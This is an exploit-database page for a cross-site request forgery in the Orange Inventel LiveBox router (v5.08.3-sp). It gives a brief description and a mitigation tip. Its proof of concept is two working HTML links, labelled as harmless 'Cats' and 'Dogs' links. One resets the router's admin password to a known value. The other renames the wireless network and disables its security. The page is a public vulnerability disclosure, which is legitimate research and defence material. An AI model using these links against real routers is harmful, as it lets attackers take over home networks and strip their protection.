header-logo
Suggest Exploit
vendor:
LiveBox
by:
BlackMamba TEAM (BM1)
7,5
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: LiveBox
Affected Version From: Inventel - v5.08.3-sp
Affected Version To: Inventel - v5.08.3-sp
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 64bit
2016

Orange Inventel LiveBox CSRF

This Router is vulnerable to Cross Site Request Forgery, a hacker can send a well crafted link or well crafted web page to the administrator and thus change the admin password (without the need to know the old one). This affects the other settings too (SSID name, SSID Security, enabling disabling the firewall, etc.).

Mitigation:

Do not click on links you can't verify there origine, especially when connected to the Router's interface.
Source

Exploit-DB raw data:

# Exploit Title: Orange Inventel LiveBox CSRF
# Google Dork: N/A
# Date: 10-24-2016
# Exploit Author: BlackMamba TEAM (BM1)
# Vendor Homepage: N/A
# Version: Inventel - v5.08.3-sp
# Tested on: Windows 7 64bit
# CVE : N/A
# Category: Hardware

1. Description
This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator.
and thus change the admin password (without the need to know the old one).
this affects the other  settings too (SSID name , SSID Security ,enabling disabling the firewall.......).

2. Proof of Concept
this link once clicked the admin password is changed to "blackmamba" (withouth ")

<a href="http://192.168.1.1/configok.cgi?sysPassword=blackmamba">Cats !!!</a>

this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network)
<a href="http://192.168.1.1/advancedboot.cgi?associateTime=10&wifiEssid=BLACKMAMBA&wifiWep=0">Dogs :D !!!</a>

3. Mitigation
this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface.

------------------------------------------------------------------------------------------------------------------------------------------------------------
From the Moroccan team : BLACK MAMBA (by BM1)

Navigation

Suggest Exploit

Services By CQR